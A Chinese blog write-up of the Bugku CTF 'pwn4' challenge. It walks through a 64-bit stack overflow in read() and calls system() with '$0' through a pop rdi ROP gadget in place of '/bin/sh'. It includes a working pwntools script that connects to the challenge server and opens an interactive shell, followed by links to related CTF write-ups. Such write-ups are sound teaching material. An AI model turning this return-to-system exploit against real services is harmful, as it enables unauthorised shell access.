Bugku-pwn4详解

最新推荐文章于 2024-11-27 14:46:39 发布
原创 最新推荐文章于 2024-11-27 14:46:39 发布 · 4.6k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#bugku pwn4 #pwn4

博客围绕bugku的pwn4题展开。先对64位动态链接且未开保护的程序进行常规检查,用IDA打开发现危险函数用于溢出。找到可利用的字符串,结合函数和参数实现溢出。还提及32位与64位程序传参方式不同,最后给出利用思路和脚本。

这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。

pwn4_1.png

一个64位动态链接的程序,没有开什么保护

然后用IDA打开,有个危险函数read,可以用来溢出。

pwn4_2.png

shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数

pwn4_3.png

但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPgadget --binary pwn4 --string '/bin/sh',搜索无果。。。再回到IDA中检测字符串

pwn4_4.png

发现了一个$0$0在linux中为为shell或shell脚本的名称

system()会调用fork()产生子进程,由子进程来调用/bin/sh -c string来执行参数string字符串所代表的命令,此命令执行完后随即返回原调用的进程。

所以如果将$0作为system的参数,能达到传入'/bin/sh'一样的效果。

在这里插入图片描述

上面的图展示了$0bash中的值,可以看到一开始的进程只有两个,此时输出$0,得到的是bash本身,单独输入$0,可以看到多了一个bash进程。

有了system函数和$0作为参数,就可以进行溢出了。

还有要注意的就是64位程序和32位程序的传参方式不一样32位的函数调用使用栈传参64位的函数调用使用寄存器传参,分别用rdirsirdxrcxr8r9来传递参数(参数个数小于7的时候)。

我们利用ROPgadget工具进行查找,得到pop rdi ; ret$0的地址,system的地址直接在IDA中查看

pwn4_6.png

在这里插入图片描述

首先先填充缓冲区,大小为0x10,然后覆盖rbp,8个字节,传入pop rdi;ret的地址和$0,将栈中$0的地址弹出,存入rdi作为参数,在传入system地址进行调用。

下面是脚本

from pwn import *

context.log_level = 'debug'

conn = remote('114.116.54.89', 10004)
# conn = process('./pwn4')

pop_rdi = 0x00000000004007d3 
bin_sh = 0x000000000060111f
system = 0x000000000040075A

payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(bin_sh) + p64(system)  

conn.recvuntil('Come on,try to pwn me')

conn.sendline(payload)

conn.interactive()

pwn4

bugku_pwn4
Vicl1fe的博客
10-26 542
https://blog.youkuaiyun.com/casuall/article/details/95865447
Bugku PWN Easy_int
JEWSWS的博客
04-01 852
【春风不解语,独做狮子吟。】
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
Bugku pwn4
BengDouLove的博客
02-16 448
bugku pwn4 先ida打开elf文件,发现是64位,之前知道64位和32位有所不同但是还没有接触到过 程序里没什么,然后打开字符串子视图 有这么一句话,引起怀疑,然后双击点开,右键点开外部引用图表到 发现0x400751这个函数在调用这一段字符串,打开400751并且反汇编,发现是system函数,里面的参数正是这一段字符串,想到如果里面是系统指令就好了。 打开虚拟机,调试过程中也没有...
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 2336
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BUUCTF-PWN详解pwn1_sctf_2016 1&jarvisoj_level0 1)
2302_80325559的博客
11-27 2719
今天给大家介绍了几个危险函数strcpy、read,以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题,思路大差不差,都是先找从哪儿溢出,然后后门的地址。如果大家可以自己独立做出来的话,就可以说只要以后见到这种题,分分钟拿下。后面的题就不会留这么明显的后门给我们了,会让我们自己创建后门,难度会大一点点。我尽量以简洁的语言给大家说清楚,大家一起加油!
精选资源
S2 AWD排位赛-9.zip
12-07
【S2 AWD排位赛-9.zip】这个压缩包文件是BugKu在2021年举办的一场CTF(Capture The Flag)攻防战排位赛的真实题目集合。CTF是一种网络安全竞赛,参赛者通过解密、逆向工程、漏洞挖掘等技术手段获取“旗标”(Flag)...
2021-06-15 pwn之canary绕过简单思路梳理
yulate的个人博客
07-13 1016
文章目录一、原题链接二、简单解题思路0x01、查看程序保护0x02、main的栈0x03、构造payload0x04、最终exp 一、原题链接 bugku-pwn4 二、简单解题思路 0x01、查看程序保护 开启了canary保护和NX保护 0x02、main的栈 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+10h] [rbp-240h] BYREF char v5
CTF-PWN学习-为缺少指导的同学而生_ctf pwn
2401_84296945的博客
04-28 1272
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
pwn4-bugku
weixin_45427676的博客
09-18 808
checksec 首先用checksec命令查看有没有什么保护机制 没有开任何保护机制,用IDA(64位)打开查看main函数。 函数分析 # memset函数 # setvbuf函数 # read函数 经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。 s大小 ...
bugku pwn4(栈溢出)
weixin_44954083的博客
12-11 537
查看保护机制,没有任何保护 拉入ida看一下 read函数是一个危险函数,造成栈溢出 查看一下没有binsh字符串,但在ida里面看到哪个$0(这个在linux是shell脚本的名称) system()调用frok()产生子进程,由子进程来调用/bin/sh - c string来执行参数string字符串所代表的命令,系统调用 注一下: ps 是显示当前进程 ps a 显示目前所有程序,包...
Bugku pwn4 WP
至臻求学,胸怀云月
02-18 915
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x4...
Pwn4 - Bugku
SkYe's Blog
10-22 453
Pwn4 - Bugku 程序基本情况 程序为64位,保护全关 代码审计 在main()函数中的read造成了栈溢出 IDAshift + F12检查有没有可疑字符串,同时检查有没有特殊函数如getshell() 在sub_400751()里面出现了调用system() 思路 main()函数存在栈溢出,可调用system()getshell,但是缺少一个参数/bin/sh。在字符串查找中...
[BUGKU] [PWN] PWN4
Stan冲冲冲
05-18 283
[BUGKU] [PWN] PWN4 先下载文件,拉入UBUNTU,checksec检查一下 checksec pwn4 发现啥都没开,最重要的是架构是amd64 在windows里把pwn4拉入64位ida 按F5切换到伪C 发现read可以溢出 read(0, &s, 0x30uLL); shift+f12查看字符串,发现没有/bin/sh,但是有$0 .data:0000000000601100 a4985y9yDyYfg8y db ‘4985y9y()DY)*YFG8yas08d9
bugku pwn4 学习
欢迎来到神林的博客
08-27 1402
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
[Bugku CTF——Pwn] pwn4
Y_peak的博客
03-22 875
[Bugku CTF——Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadget就好 思路 将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来 exploit from pwn import * #p = process('./pwn4_') p = remote('114.67.246.176',15541) pop_rdi = 0x00
ubuntu安装mqtt-pwn
最新发布
03-31
### 安装 mqtt-pwn 工具 要在 Ubuntu 上安装 `mqtt-pwn` 工具,可以按照以下方法操作。`mqtt-pwn` 是一款针对 MQTT 协议的安全测试框架,支持多种功能来评估 MQTT 服务器的安全性。 #### 准备工作 首先需要确保系统已更新至最新状态并安装必要的依赖项。可以通过运行以下命令完成环境准备: ```bash sudo apt update && sudo apt upgrade -y sudo apt install python3 python3-pip git -y ``` 以上命令会安装 Python 3、pip 和 Git 工具[^1]。 #### 下载和安装 mqtt-pwn 通过 GitHub 获取 `mqtt-pwn` 的源码,并使用 pip 进行安装: ```bash git clone https://github.com/jh0ker/mqtt-pwn.git cd mqtt-pwn pip3 install --upgrade setuptools wheel pip3 install . ``` 上述命令克隆了项目的仓库到本地目录,并执行了所需的包管理器指令以安装项目及其依赖关系[^2]。 #### 验证安装 为了验证 `mqtt-pwn` 是否成功安装,可尝试启动该工具: ```bash mqtt_pwn --help ``` 如果显示帮助信息,则说明安装过程顺利完成[^3]。 #### 常见问题处理 有时可能会遇到权限错误或者缺少某些库的情况。在这种情况下,建议使用虚拟环境隔离全局 Python 环境的影响: ```bash python3 -m venv mqtt_env source mqtt_env/bin/activate pip install --upgrade setuptools wheel pip install -r requirements.txt ``` 这样可以在独立环境中重新构建所需组件而不干扰系统的其他部分[^4]。 ---
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值